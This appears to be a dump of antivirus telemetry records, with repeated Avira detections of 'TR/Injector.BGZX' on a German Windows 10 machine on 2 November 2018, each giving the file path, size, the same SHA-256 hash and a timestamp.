  Row(detection=Row(filename='avscan-20181102-052849-2606cb59', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052849-2606CB59', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054544-82d815b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054544-82D815B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055640-09b342cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055640-09B342CF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054751-ceb2e240', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054751-CEB2E240', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053239-aecd1c75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053239-AECD1C75', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054706-b3db860d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054706-B3DB860D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053302-bc89f103', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053302-BC89F103', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052830-1a386973', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052830-1A386973', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053301-bbeabb70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053301-BBEABB70', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053917-9c37b86c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053917-9C37B86C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055604-f42f87bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055604-F42F87BD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060104-a6e58bc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060104-A6E58BC8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052830-1a88a3b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052830-1A88A3B8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053943-abc11ce6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053943-ABC11CE6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054544-82eed772', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054544-82EED772', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055628-027fb73d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055628-027FB73D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052140-260a9075', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052140-260A9075', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052114-16921755', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052114-16921755', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052115-16fbc738', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052115-16FBC738', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052114-16bfbdf4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052114-16BFBDF4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052118-1900676a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052118-1900676A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052920-380504c4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052920-380504C4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052958-4ee814e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052958-4EE814E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052918-3707e5b1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052918-3707E5B1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052200-3220a4f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052200-3220A4F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052939-43a07a29', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052939-43A07A29', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052122-1b53647d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052122-1B53647D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052122-1b694fd9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052122-1B694FD9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052115-1748a3fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052115-1748A3FE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052105-11193495', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052105-11193495', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052145-292bfbb8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052145-292BFBB8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052105-113f82d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052105-113F82D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052906-3004b003', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052906-3004B003', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052147-2a2f5571', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052147-2A2F5571', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052105-11305ea8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052105-11305EA8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052151-2ccc2c82', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052151-2CCC2C82', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052137-246991b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052137-246991B3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052151-2cadef95', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052151-2CADEF95', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052137-248e33db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052137-248E33DB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052119-19e0c624', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052119-19E0C624', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052119-19bcba47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052119-19BCBA47', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052119-198c0507', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052119-198C0507', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052142-275a444d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052142-275A444D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052146-29a6b5c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052146-29A6B5C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052133-22160133', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052133-22160133', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052920-3813a47c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052920-3813A47C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052133-21da5935', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052133-21DA5935', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052134-22485a92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052134-22485A92', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052131-20bff8be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052131-20BFF8BE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052135-22ef0ee5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052135-22EF0EE5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052148-2ae6eee3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052148-2AE6EEE3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052134-22718f05', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052134-22718F05', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052940-442a4573', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052940-442A4573', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052922-3933cfe9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052922-3933CFE9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052936-41ad1dac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052936-41AD1DAC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:35Z'), dt=datetime.date(2018, 11, 2)),
